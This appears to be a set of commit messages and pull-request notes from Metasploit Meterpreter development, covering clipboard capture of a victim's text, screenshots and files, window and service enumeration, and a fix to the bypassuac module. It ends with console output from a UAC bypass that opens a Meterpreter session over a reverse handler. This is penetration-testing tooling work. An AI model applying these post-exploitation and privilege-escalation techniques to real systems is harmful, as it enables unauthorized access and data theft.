* Rename methods to remove redundancy.
* Update bins to freshly compiled version.
* Use the Rex Table functionality instead of custom look.
* Use the `usage` feature of the Arguments class for help.
Image data copied to the clipboard, such as a screenshot, is converted to a JPEG using GDI+, and downloaded to the local loot folder.
This feature doesn't work with W2K as a result, but that doesn't really bother me. The code is simpler and much smaller as a result and doesn't require the inclusion of the jpeg library code.
`clipboard_get_data` has been changed so that raw text is supported and file listings are supported.
If files are on the clipboard, those files and folders are listed when this command is run. To download the files, pass in the `-d` option.
This commit adds support for getting text-based information from the
victim's clipboard and for setting text-based data to the victim's
clipboard. Early days, with much wiggle room left for extra fun
Children of windows can now be enumerated via the -p parameter, which
specifies the handle of the parent window to enumerate.
There is also a -u parameter which includes unknown/untitled windows
in the result set.
The extapi project will get bigger over time so this change allows for the code to get
bigger without becoming a headache before it starts.
Added binaries to this commit as well.
This commit adds the ability to enumerate services on the target machine,
showing the PID, the service name, the display name and an indication of
the service's ability to interact with the desktop.
Some other small code tidies were done too.
Decided to kick off a new extended API extension with mubix and
kernelsmith to include some more advanced enumeration stuff. The goal of
this extension is to take stuff that wouldn't be part of the std api but
is rather useful for enumeration of a target once meterpreter has been
This commit kicks things off with enumeration of top level windows on the
current desktop.
The new changes when calling uac_level = open_key.query_value('ConsentPromptBehaviorAdmin') breaks UAC on Windows 7 and Windows 8 and shows that UAC is not enabled when it is:
Here is prior to the change on a fully patched Windows 8 machine:
msf exploit(bypassuac) > exploit
[*] Started reverse handler on
[*] UAC is Enabled, checking level...
[-] UAC is not enabled, no reason to run module
[-] Run exploit/windows/local/ask to elevate
msf exploit(bypassuac) >
Here's the module when running with the most recent changes that are being proposed:
[*] Started reverse handler on
[*] UAC is Enabled, checking level...
[!] Could not determine UAC level - attempting anyways...
[*] Checking admin status...
[+] Part of Administrators group! Continuing...
[*] Uploading the bypass UAC executable to the filesystem...
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Uploaded the agent to the filesystem....
[*] Sending stage (770048 bytes) to
[*] Meterpreter session 6 opened ( -> at 2013-10-05 15:49:23 -0400
meterpreter >
With the new changes and not having a return on when 0 (will not always return 0 - just in certain cases where you cannot query) - it works.